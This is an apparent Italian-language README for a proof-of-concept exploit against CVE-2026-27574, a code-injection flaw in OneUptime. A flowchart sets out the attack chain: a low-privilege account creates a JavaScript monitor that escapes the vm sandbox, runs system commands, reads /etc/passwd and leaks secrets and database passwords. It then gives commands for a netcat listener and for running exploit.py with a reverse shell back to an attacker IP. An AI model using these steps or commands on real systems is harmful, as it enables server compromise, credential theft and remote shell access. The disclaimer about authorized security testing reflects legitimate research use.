
Proof-of-concept exploit per CVE-2026-27574, un'iniezione di codice critica in OneUptime che consente l'esecuzione remota di codice e la divulgazione di variabili d'ambiente.
Exploit proof-of-concept per CVE-2026-27574 – una vulnerabilità critica di code injection (CWE-94) in OneUptime < 10.0.0 che consente l'esecuzione arbitraria di JavaScript nel contesto del probe, portando a completa e alla divulgazione di variabili d'ambiente sensibili.
Corretto in: OneUptime 10.0.0 (migrazione a isolated-vm)
Tipo di exploit: Remoto
Autenticazione: Privilegi bassi (qualsiasi membro registrato del progetto)
Impatto: Compromissione completa del server, furto di credenziali, takeover del cluster
flowchart TD
A[Start] --> B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
# Avvia il listener (se si usa la reverse shell)
nc -lvnp 4444
# Esegui l'exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
requests (pip install requests)Questo codice è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si dispone di esplicito permesso di test è illegale e non etico.
Sviluppato da Mohammed Idrees Banyamer • Giordania • @banyamer_security